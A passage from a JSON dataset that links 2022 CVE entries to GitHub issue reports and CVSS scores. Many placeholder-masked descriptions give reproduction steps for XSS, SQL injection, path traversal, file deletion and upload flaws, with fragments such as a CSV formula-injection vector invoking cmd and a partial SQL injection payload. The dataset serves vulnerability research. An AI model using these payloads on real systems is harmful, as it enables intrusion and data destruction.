  81999. "description": "Cross Site Scripting (XSS) Security Issue . Affected software : php mysql admin panel generator Version : N/A Type of vulnerability : XSS APITAG Site Scripting) Author : s7safe Description: php mysql admin panel generator is susceptible to cross site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages . APITAG : login the system FILETAG turn to URLTAG APITAG APITAG Successful FILETAG Reason: Failure to filter or escape special characters leads to vulnerabilities How to fix : escape special characters or filter it . by s7safe",
  82000. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82001. "severity": "MEDIUM",
  82002. "baseScore": 5.4,
  82003. "impactScore": 2.7,
  82004. "exploitabilityScore": 2.3
  82005. },
  82006. {
  82007. "CVE_ID": "CVE-2022-28111",
  82008. "Issue_Url_old": "https://github.com/pagehelper/Mybatis-PageHelper/issues/674",
  82009. "Issue_Url_new": "https://github.com/pagehelper/mybatis-pagehelper/issues/674",
  82010. "Repo_new": "pagehelper/mybatis-pagehelper",
  82011. "Issue_Created_At": "2022-06-02T07:20:42Z",
  82012. "description": "\u5173\u4e8e CVETAG \u6f0f\u6d1e\uff0c\u4e0d\u8981\u5728\u53d1 issues \u4e86\uff01\uff01\uff01. APITAG \u5982\u679c\u4f60\u4ece\u524d\u7aef\u4f20\u9012\u4e00\u4e2a SQL \u7528 JDBC \u539f\u751f\u65b9\u5f0f\u6267\u884c\uff0c\u4f60\u662f\u4e0d\u662f\u53d1\u73b0\u4e86\u4e00\u4e2a\u5929\u5927\u7684\u6f0f\u6d1e\uff1f \u5982\u679cJDBC\u4e0d\u505a\u5904\u7406\uff0c\u662f\u4e0d\u662f\u5c31\u4e0d\u7528 JDBC \u4e86\uff1f \u5982\u679c\u8fd9\u4e2a\u6f0f\u6d1e\u4f1a\u5f71\u54cd\u4f60\u4eec\u9879\u76ee\u9009\u62e9\u5206\u9875\u63d2\u4ef6\uff0c\u53ef\u4ee5\u5728\u5f53\u524d issues \u7559\u8a00\uff0c\u5982\u679c\u7559\u8a00\u4eba\u6570\u5f88\u591a\uff0c\u4e0b\u4e2a\u7248\u672c\u53ef\u4ee5\u628a order by \u529f\u80fd\u53bb\u6389\u3002",
  82013. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82014. "severity": "CRITICAL",
  82015. "baseScore": 9.8,
  82016. "impactScore": 5.9,
  82017. "exploitabilityScore": 3.9
  82018. },
  82019. {
  82020. "CVE_ID": "CVE-2022-28118",
  82021. "Issue_Url_old": "https://github.com/siteserver/cms/issues/3386",
  82022. "Issue_Url_new": "https://github.com/siteserver/cms/issues/3386",
  82023. "Repo_new": "siteserver/cms",
  82024. "Issue_Created_At": "2022-05-02T12:48:09Z",
  82025. "description": "Plugin Vulnerability. The plugin function allows you to execute arbitrary code to obtain server permissions Detail: FILETAG The corresponding CVE number CVETAG has been applied It is hoped that corresponding restrictions can be carried out :)",
  82026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82027. "severity": "CRITICAL",
  82028. "baseScore": 9.8,
  82029. "impactScore": 5.9,
  82030. "exploitabilityScore": 3.9
  82031. },
  82032. {
  82033. "CVE_ID": "CVE-2022-28352",
  82034. "Issue_Url_old": "https://github.com/weechat/weechat/issues/1763",
  82035. "Issue_Url_new": "https://github.com/weechat/weechat/issues/1763",
  82036. "Repo_new": "weechat/weechat",
  82037. "Issue_Created_At": "2022-03-12T13:03:28Z",
  82038. "description": "Having to re-set the APITAG env variable every single session.. Question Every time I start a session of Weechat and attempt to connect to a server, if the APITAG config option has already been set to anything, or even nothing at all, and even when it has been correctly set to APITAG from previous sessions, I always encounter certificate issues with gnutls and thus the TLS handshake will fail, preventing me from making a secure connection to any server (non-SSL connections still work, of course) ERRORTAG However, if I then proceed to APITAG to something else, and then after that set it to the correct value with APITAG , Weechat will handle SSL certificates and connect just fine like it is supposed to. But when I quit and the next time I start Weechat, the same issue shows up again, and then I have to manually set that configuration to something else wrong on purpose, then set it back right again, even when it is already right! I have already tried to find a way to circumvent this issue by starting weechat with a new config APITAG , and even there, the same issue happens after I quit and restart. Right now, my only option to get around this issue is probably to use a script that can APITAG to something different each time I quit the client, and then set the weechat client to run the correct APITAG command option on startup. Still though, I'd rather seek help to see why exactly my APITAG is behaving this way. APITAG version NUMBERTAG OS, distribution and version: APITAG Linu NUMBERTAG",
  82039. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
  82040. "severity": "MEDIUM",
  82041. "baseScore": 4.8,
  82042. "impactScore": 2.5,
  82043. "exploitabilityScore": 2.2
  82044. },
  82045. {
  82046. "CVE_ID": "CVE-2022-28355",
  82047. "Issue_Url_old": "https://github.com/scala-js/scala-js/issues/4657",
  82048. "Issue_Url_new": "https://github.com/scala-js/scala-js/issues/4657",
  82049. "Repo_new": "scala-js/scala-js",
  82050. "Issue_Created_At": "2022-03-25T23:09:04Z",
  82051. "description": "FILETAG should not provide a cryptographically insecure APITAG implementation. I'm specifically thinking about this section of code: URLTAG The Java NUMBERTAG docs for APITAG state: > Static factory to retrieve a type NUMBERTAG pseudo randomly generated) UUID. The UUID is generated using a cryptographically strong pseudo random number generator. Furthermore, URLTAG states that: > Developers who have not been exposed to RFC NUMBERTAG might naturally opt to invent their own approaches to UUID generation, potentially using APITAG (in TIFU by using APITAG there's an in depth discussion of why a Cryptographically Secure Pseudo Random Number Generator (_CSPRNG_) should be used when generating UUIDs). It's unclear to me how a developer or cross compiling their library or application for Scala.js should become aware that in fact they cannot rely on APITAG for cryptographically strong UUIDs. This seems a lot like a CVE to me. See also discussion in URLTAG PS would be good to set up a security policy at URLTAG",
  82052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82053. "severity": "HIGH",
  82054. "baseScore": 7.5,
  82055. "impactScore": 3.6,
  82056. "exploitabilityScore": 3.9
  82057. },
  82058. {
  82059. "CVE_ID": "CVE-2022-28379",
  82060. "Issue_Url_old": "https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1950",
  82061. "Issue_Url_new": "https://github.com/nginxproxymanager/nginx-proxy-manager/issues/1950",
  82062. "Repo_new": "nginxproxymanager/nginx-proxy-manager",
  82063. "Issue_Created_At": "2022-03-24T14:14:30Z",
  82064. "description": "Stored XSS when deleting proxy host. Steps to reproduce NUMBERTAG Login as administrative user NUMBERTAG Create a new proxy host entry with the payload APITAG as domain NUMBERTAG Hit save NUMBERTAG Try to delete the newly added proxy host. XSS payload is executed. FILETAG FILETAG FILETAG Recommendation: Implementing input validation and/or ensuring output sanitization. Risk: Low risk since high privileges are required.",
  82065. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  82066. "severity": "MEDIUM",
  82067. "baseScore": 4.8,
  82068. "impactScore": 2.7,
  82069. "exploitabilityScore": 1.7
  82070. },
  82071. {
  82072. "CVE_ID": "CVE-2022-28448",
  82073. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6191",
  82074. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6191",
  82075. "Repo_new": "nopsolutions/nopcommerce",
  82076. "Issue_Created_At": "2022-03-19T09:32:47Z",
  82077. "description": "Stored XSS in customer name when a customer accesses a denied resource and is redirected to the login page. APITAG version NUMBERTAG Steps to reproduce the problem: FILETAG Inject javascript code into First name or Last name at Customer Info When the customer accesses a denied resource, for example /admin, the server will redirect the user to the login page and show the notification: APITAG are already logged in as APITAG Name}. You may log in with another account.\". The Customer Name is reflected in the response without HTML encoding, and causes XSS when APITAG is called. Note: If the admin used the Place order (impersonate) feature, the customer's javascript will execute under the admin session.",
  82078. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82079. "severity": "MEDIUM",
  82080. "baseScore": 5.4,
  82081. "impactScore": 2.7,
  82082. "exploitabilityScore": 2.3
  82083. },
  82084. {
  82085. "CVE_ID": "CVE-2022-28449",
  82086. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6192",
  82087. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6192",
  82088. "Repo_new": "nopsolutions/nopcommerce",
  82089. "Issue_Created_At": "2022-03-20T08:35:25Z",
  82090. "description": "Unrestricted File Upload in the Apply for vendor account feature. APITAG version NUMBERTAG Steps to reproduce the problem: In the Apply for vendor account feature, a customer can upload an arbitrary file, for example file FILETAG with the submitted form content as below: ERRORTAG After the admin views the vendor application by clicking the Edit button, the uploaded file is generated and the final uploaded file path has the format PATHTAG FILETAG The id parameter is a NUMBERTAG digit auto-incremented number, so it is easy to guess or brute-force. User input APITAG has special characters filtered, so I only used alphabetic characters here to keep the output unchanged. Content Type is text/html => the content-type extension is html (the extension is derived from the attacker-supplied Content-Type). One of my final uploaded files is FILETAG Impact: Unrestricted File Upload in the Apply for vendor account feature leading to Stored XSS FILETAG",
  82091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82092. "severity": "MEDIUM",
  82093. "baseScore": 6.1,
  82094. "impactScore": 2.7,
  82095. "exploitabilityScore": 2.8
  82096. },
  82097. {
  82098. "CVE_ID": "CVE-2022-28450",
  82099. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6194",
  82100. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6194",
  82101. "Repo_new": "nopsolutions/nopcommerce",
  82102. "Issue_Created_At": "2022-03-20T12:30:36Z",
  82103. "description": "XSS issue in the APITAG parameter. APITAG version NUMBERTAG Description: A stored cross site scripting (XSS) vulnerability exists when creating a new post of APITAG version NUMBERTAG that allows a remote attacker to execute arbitrary APITAG code at client browser Steps to reproduce the problem: Step NUMBERTAG Create new topic or reply topic with injecting APITAG to APITAG parameter FILETAG Step2: Click a text APITAG at topic that created in step NUMBERTAG to trigger XSS FILETAG Let me know if you require additional information.",
  82104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82105. "severity": "MEDIUM",
  82106. "baseScore": 5.4,
  82107. "impactScore": 2.7,
  82108. "exploitabilityScore": 2.3
  82109. },
  82110. {
  82111. "CVE_ID": "CVE-2022-28451",
  82112. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6203",
  82113. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6203",
  82114. "Repo_new": "nopsolutions/nopcommerce",
  82115. "Issue_Created_At": "2022-03-28T08:57:13Z",
  82116. "description": "Possible issue with database backup filenames. APITAG version NUMBERTAG The Maintenance feature in APITAG version NUMBERTAG is vulnerable to path traversal: a user can supply a crafted value for the APITAG parameter by sending the POST request manually.",
  82117. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82118. "severity": "HIGH",
  82119. "baseScore": 7.5,
  82120. "impactScore": 3.6,
  82121. "exploitabilityScore": 3.9
  82122. },
  82123. {
  82124. "CVE_ID": "CVE-2022-28461",
  82125. "Issue_Url_old": "https://github.com/lanfei-4/mingyuefusu/issues/1",
  82126. "Issue_Url_new": "https://github.com/lanfei-4/mingyuefusu/issues/1",
  82127. "Repo_new": "lanfei-4/mingyuefusu",
  82128. "Issue_Created_At": "2022-03-28T03:32:02Z",
  82129. "description": "mingyuefusu library management system SQL injection vulnerability in all versions. Log in to the system FILETAG Click the labeled position to capture the request packets, then use time-based SQL injection to confirm the vulnerability FILETAG Verify the SQL injection vulnerability using APITAG FILETAG Code analysis PATHTAG FILETAG PATHTAG The following code does not use APITAG FILETAG Note: the reproduction steps start from a logged-in session, while the assigned CVSS vector assumes no privileges are required.",
  82130. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82131. "severity": "CRITICAL",
  82132. "baseScore": 9.8,
  82133. "impactScore": 5.9,
  82134. "exploitabilityScore": 3.9
  82135. },
  82136. {
  82137. "CVE_ID": "CVE-2022-28462",
  82138. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/85",
  82139. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/85",
  82140. "Repo_new": "201206030/novel-plus",
  82141. "Issue_Created_At": "2022-04-04T03:01:19Z",
  82142. "description": "Arbitrary file reading vulnerability exists in the ve APITAG Vulnerable code: ERRORTAG NUMBERTAG Validation of the vulnerability FILETAG",
  82143. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82144. "severity": "HIGH",
  82145. "baseScore": 7.5,
  82146. "impactScore": 3.6,
  82147. "exploitabilityScore": 3.9
  82148. },
  82149. {
  82150. "CVE_ID": "CVE-2022-28463",
  82151. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/4988",
  82152. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/4988",
  82153. "Repo_new": "imagemagick/imagemagick",
  82154. "Issue_Created_At": "2022-03-25T05:27:23Z",
  82155. "description": "APITAG heap buffer overflow PATHTAG in APITAG APITAG version NUMBERTAG Operating system Linux Operating system, version and so on Linux d NUMBERTAG f NUMBERTAG ae NUMBERTAG generic APITAG Ubuntu SMP Tue Mar NUMBERTAG UTC NUMBERTAG APITAG Description Hello, we are currently working on a fuzz testing feature, and we found a heap use-after-free on APITAG (the issue title calls it a heap buffer overflow; the two labels differ and should be reconciled against the ASAN report). Steps to Reproduce \u279c oss fuzz git:(master) \u2717 python infra/helper.py reproduce imagemagick encoder_cin_fuzzer PATHTAG APITAG docker run rm privileged i v PATHTAG v PATHTAG t PATHTAG reproduce encoder_cin_fuzzer runs NUMBERTAG FUZZER=encoder_cin_fuzzer + shift + ' FILETAG",
  82156. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  82157. "severity": "HIGH",
  82158. "baseScore": 7.8,
  82159. "impactScore": 5.9,
  82160. "exploitabilityScore": 1.8
  82161. },
  82162. {
  82163. "CVE_ID": "CVE-2022-28470",
  82164. "Issue_Url_old": "https://github.com/joajfreitas/marcador/issues/5",
  82165. "Issue_Url_new": "https://github.com/joajfreitas/marcador/issues/5",
  82166. "Repo_new": "joajfreitas/marcador",
  82167. "Issue_Created_At": "2022-03-28T11:41:59Z",
  82168. "description": "Code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project; the backdoor is the 'request' dependency package. Even though the request package was removed from PyPI, many mirror sites did not completely delete it, so it could still be APITAG using pip3 install marcador NUMBERTAG i URLTAG trusted host APITAG and the malicious request plugin is installed successfully. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  82169. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82170. "severity": "CRITICAL",
  82171. "baseScore": 9.8,
  82172. "impactScore": 5.9,
  82173. "exploitabilityScore": 3.9
  82174. },
  82175. {
  82176. "CVE_ID": "CVE-2022-28471",
  82177. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/49",
  82178. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/49",
  82179. "Repo_new": "rockcarry/ffjpeg",
  82180. "Issue_Created_At": "2022-03-25T10:42:12Z",
  82181. "description": "Integer overflow in APITAG resulting in heap overflow in APITAG at APITAG version : master (commit caade NUMBERTAG URLTAG poc : poc URLTAG command : ./ffjpeg e $poc$ Here is the trace reported by ASAN: ERRORTAG This issue is the same as NUMBERTAG but the fix for it NUMBERTAG fa4cf8 URLTAG is incomplete. An integer overflow is still possible at line NUMBERTAG In the example below, when APITAG , APITAG, which bypasses the check at line NUMBERTAG This leads to a heap buffer overflow in APITAG as shown in the ASAN report above. URLTAG CODETAG",
  82182. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82183. "severity": "MEDIUM",
  82184. "baseScore": 6.5,
  82185. "impactScore": 3.6,
  82186. "exploitabilityScore": 2.8
  82187. },
  82188. {
  82189. "CVE_ID": "CVE-2022-28481",
  82190. "Issue_Url_old": "https://github.com/zvory/csv-safe/issues/7",
  82191. "Issue_Url_new": "https://github.com/zvory/csv-safe/issues/7",
  82192. "Repo_new": "zvory/csv-safe",
  82193. "Issue_Created_At": "2022-03-10T17:08:57Z",
  82194. "description": "More special characters need to be filtered out for better security. MENTIONTAG First of all, you have done an amazing job with this gem. It is suggested to filter out more special characters such as | and % because the current gem can be bypassed with a formula-injection vector such as NUMBERTAG A NUMBERTAG cmd|' /C calc'!D2 in older versions. References: URLTAG URLTAG CVETAG",
  82195. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82196. "severity": "CRITICAL",
  82197. "baseScore": 9.8,
  82198. "impactScore": 5.9,
  82199. "exploitabilityScore": 3.9
  82200. },
  82201. {
  82202. "CVE_ID": "CVE-2022-28487",
  82203. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/723",
  82204. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/723",
  82205. "Repo_new": "appneta/tcpreplay",
  82206. "Issue_Created_At": "2022-03-28T20:35:50Z",
  82207. "description": "APITAG Format string vulnerability in APITAG function. Describe the bug Tcpreplay version NUMBERTAG contains a format string flaw, CVETAG, in the APITAG function that can leak memory contents. The highest threat from this vulnerability is to data confidentiality. The inputs required to exploit the vulnerability are unknown. URLTAG Additional context A patch was proposed in the following pull request: URLTAG",
  82208. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82209. "severity": "HIGH",
  82210. "baseScore": 7.5,
  82211. "impactScore": 3.6,
  82212. "exploitabilityScore": 3.9
  82213. },
  82214. {
  82215. "CVE_ID": "CVE-2022-28488",
  82216. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/29",
  82217. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/29",
  82218. "Repo_new": "marc-q/libwav",
  82219. "Issue_Created_At": "2022-03-27T22:15:14Z",
  82220. "description": "Use of uninitialized value in function wav_format_write in libwav.c. Describe the bug An uninitialized variable is used in function wav_format_write. The highest threat from this vulnerability is to data confidentiality. The uninitialized variable format is copied to the stream pointed to by the f variable, as illustrated below. URLTAG System info Ubuntu NUMBERTAG LTS, clang version NUMBERTAG latest commit APITAG Steps to reproduce the behavior compile the program with APITAG Run command: APITAG poc URLTAG Output ERRORTAG Note: wav_chunk_write calls wav_format_write, which is where the bug is.",
  82221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82222. "severity": "HIGH",
  82223. "baseScore": 7.5,
  82224. "impactScore": 3.6,
  82225. "exploitabilityScore": 3.9
  82226. },
  82227. {
  82228. "CVE_ID": "CVE-2022-28505",
  82229. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/33",
  82230. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/33",
  82231. "Repo_new": "jflyfox/jfinal_cms",
  82232. "Issue_Created_At": "2022-03-29T08:03:30Z",
  82233. "description": "SQL injection vulnerability exists in APITAG CMS NUMBERTAG SQL injection vulnerability exists in APITAG CMS NUMBERTAG Analysis The vulnerability appears in lines NUMBERTAG of the APITAG FILETAG Here call APITAG to query with the following statement: APITAG When the length of APITAG is not equal to NUMBERTAG go into the if branch and call the APITAG method to concatenate APITAG \uff1a FILETAG The SQL statement after concatenation is as follows: APITAG Moving on, the APITAG parameter is concatenated to the end of the SQL statement String APITAG = APITAG (); defines the source of the APITAG argument APITAG FILETAG APITAG FILETAG The APITAG parameter is the APITAG parameter passed from the front end So you can construct payload to exploit this vulnerability Exploit Maven Startup Environment Vulnerability address: PATHTAG FILETAG Injection parameters: APITAG payload\uff1a ) AND (SELECT NUMBERTAG FROM APITAG woqr FILETAG SQLMAP Injection\uff1a FILETAG",
  82234. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82235. "severity": "HIGH",
  82236. "baseScore": 7.2,
  82237. "impactScore": 5.9,
  82238. "exploitabilityScore": 1.2
  82239. },
  82240. {
  82241. "CVE_ID": "CVE-2022-28521",
  82242. "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/4",
  82243. "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/4",
  82244. "Repo_new": "jorycn/thinkphp-zcms",
  82245. "Issue_Created_At": "2022-03-30T04:11:36Z",
  82246. "description": "There is a file inclusion vulnerability here: APITAG Vulnerability PATHTAG The vulnerability code is as follows: You can see that the incoming file is directly included here, and the file is not filtered FILETAG Vulnerability to reproduce: APITAG create a FILETAG file in the root directory of the website\uff0cof course, this can be any file in the root directory of the website FILETAG APITAG code in the FILETAG file is as follows: FILETAG APITAG url: URLTAG \uff0cuse the post method to pass in $file and $config_array FILETAG APITAG can see that FILETAG is successfully generated in the root directory of the website FILETAG APITAG backdoor tool to connect FILETAG FILETAG Repair suggestion: APITAG incoming files to php suffix APITAG the incoming filename APITAG and filter the content of incoming files",
  82247. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82248. "severity": "CRITICAL",
  82249. "baseScore": 9.8,
  82250. "impactScore": 5.9,
  82251. "exploitabilityScore": 3.9
  82252. },
  82253. {
  82254. "CVE_ID": "CVE-2022-28522",
  82255. "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/5",
  82256. "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/5",
  82257. "Repo_new": "jorycn/thinkphp-zcms",
  82258. "Issue_Created_At": "2022-03-30T06:01:31Z",
  82259. "description": "There is a stored xss vulnerability here: APITAG Vulnerability PATHTAG FILETAG Vulnerability to reproduce: APITAG url: URLTAG \uff0cuse the post method to pass in parameter values\uff0cthe specific operation screenshots are as follows: FILETAG APITAG background address: URLTAG \uff0cyou can see the success popup FILETAG Or you can log in to the background, click Extension Tools, and then click Message Management\uff0ca popup will appear next FILETAG Repair suggestion: Use php built in functions such as htmlspecialchars to filter xss vulnerabilities",
  82260. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82261. "severity": "MEDIUM",
  82262. "baseScore": 5.4,
  82263. "impactScore": 2.7,
  82264. "exploitabilityScore": 2.3
  82265. },
  82266. {
  82267. "CVE_ID": "CVE-2022-28523",
  82268. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/17",
  82269. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/17",
  82270. "Repo_new": "neeke/hongcms",
  82271. "Issue_Created_At": "2022-03-31T09:16:53Z",
  82272. "description": "There is an arbitrary file deletion vulnerability here: PATHTAG Vulnerability file: PATHTAG The vulnerability code is as follows: FILETAG Arbitrary file deletion vulnerability could lead to system reinstallation Vulnerability to reproduce: APITAG log in to the background to get cookies APITAG of the code in the FILETAG file is as follows: the following code means that the system can be reinstalled as long as the FILETAG file is deleted APITAG APITAG . 'config/ FILETAG '); if(defined('SYSDIR')){ echo ' APITAG APITAG APITAG APITAG APITAG APITAG APITAG echo $footer; APITAG } APITAG APITAG the packet that deletes the config.php file as follows: APITAG POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: APITAG DNT NUMBERTAG Connection: close PATHTAG APITAG Repair suggestion: APITAG ../ or ..\\\\ in file variables APITAG allow files in the specified directory to be deleted",
  82273. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  82274. "severity": "HIGH",
  82275. "baseScore": 8.1,
  82276. "impactScore": 5.2,
  82277. "exploitabilityScore": 2.8
  82278. },
  82279. {
  82280. "CVE_ID": "CVE-2022-28525",
  82281. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/5",
  82282. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/5",
  82283. "Repo_new": "chilin89117/ED01-CMS",
  82284. "Issue_Created_At": "2022-03-31T14:25:34Z",
  82285. "description": "There is a file upload vulnerability here: APITAG Vulnerability file: PATHTAG FILETAG Vulnerability to reproduce: APITAG in to the background, then visit the url: URLTAG The operation is shown in the following figure: FILETAG APITAG url: FILETAG FILETAG Repair suggestion: only allow jpg, jpeg and png files to be uploaded, enforcing the allow-list on the server side",
  82286. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82287. "severity": "HIGH",
  82288. "baseScore": 8.8,
  82289. "impactScore": 5.9,
  82290. "exploitabilityScore": 2.8
  82291. },
  82292. {
  82293. "CVE_ID": "CVE-2022-28527",
  82294. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/5",
  82295. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/5",
  82296. "Repo_new": "shaogongbra/dhcms",
  82297. "Issue_Created_At": "2022-04-01T08:51:20Z",
  82298. "description": "There is an arbitrary folder deletion vulnerability PATHTAG Vulnerability file: PATHTAG You can see that the following code does not filter ../ or ..\\\\, it just filters . or .., which will cause any folder to be deleted FILETAG Vulnerability to reproduce: APITAG in to the backend first APITAG the packet as follows: APITAG POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: APITAG DNT NUMBERTAG Connection: close APITAG APITAG You can see that the page shows that the file was deleted successfully FILETAG Repair suggestion: filter ../ or ..\\\\",
  82299. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  82300. "severity": "HIGH",
  82301. "baseScore": 8.1,
  82302. "impactScore": 5.2,
  82303. "exploitabilityScore": 2.8
  82304. },
  82305. {
  82306. "CVE_ID": "CVE-2022-28528",
  82307. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/14",
  82308. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/14",
  82309. "Repo_new": "alexlang24/bloofoxcms",
  82310. "Issue_Created_At": "2022-04-01T16:12:30Z",
  82311. "description": "There is a file upload vulnerability here: APITAG Vulnerability file: FILETAG You can see that the file is uploaded directly without the verification file suffix. FILETAG Vulnerability to reproduce: APITAG log in to the backend of the website APITAG url: URLTAG . Then operate as shown below: FILETAG APITAG can see that FILETAG is successfully uploaded FILETAG APITAG FILETAG and execute the code to get phpinfo information FILETAG Repair suggestion: Set the upload whitelist and limit the suffixes of uploaded files to gif, jpg, and png",
  82312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82313. "severity": "HIGH",
  82314. "baseScore": 8.8,
  82315. "impactScore": 5.9,
  82316. "exploitabilityScore": 2.8
  82317. },
  82318. {
  82319. "CVE_ID": "CVE-2022-28552",
  82320. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/10",
  82321. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/10",
  82322. "Repo_new": "chshcms/cscms",
  82323. "Issue_Created_At": "2022-01-18T08:12:55Z",
  82324. "description": "Cscms NUMBERTAG has a SQL injection vulnerability. Log in to the backend, open the song module, create a new song, delete it to the recycle bin, and the SQL injection occurs when emptying the recycle bin. CODETAG FILETAG CODETAG FILETAG CODETAG FILETAG FILETAG PATHTAG FILETAG",
  82325. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82326. "severity": "HIGH",
  82327. "baseScore": 8.8,
  82328. "impactScore": 5.9,
  82329. "exploitabilityScore": 2.8
  82330. },
  82331. {
  82332. "CVE_ID": "CVE-2022-28585",
  82333. "Issue_Url_old": "https://github.com/leadscloud/EmpireCMS/issues/5",
  82334. "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/5",
  82335. "Repo_new": "leadscloud/empirecms",
  82336. "Issue_Created_At": "2022-04-01T08:10:06Z",
  82337. "description": "APITAG NUMBERTAG has sql injection vulnerability. Brief of this vulnerability APITAG NUMBERTAG has a SQL injection vulnerability in adding an advertisement category Test Environment Windows NUMBERTAG PHP APITAG Affected version APITAG NUMBERTAG Vulnerable Code PATHTAG line NUMBERTAG The variable $add passed in by the APITAG function is inserted into the SQL statement without any filtering, resulting in a SQL injection vulnerability FILETAG Vulnerability display First log in to the backend FILETAG Click as shown to go to the ad management module FILETAG Click to add and capture the packet FILETAG FILETAG Modify parameters APITAG or APITAG or ' FILETAG Successfully obtained the database version number. Note: the reproduction requires a logged-in backend session, while the assigned CVSS vector assumes no privileges are required.",
  82338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82339. "severity": "CRITICAL",
  82340. "baseScore": 9.8,
  82341. "impactScore": 5.9,
  82342. "exploitabilityScore": 3.9
  82343. },
  82344. {
  82345. "CVE_ID": "CVE-2022-28586",
  82346. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/63",
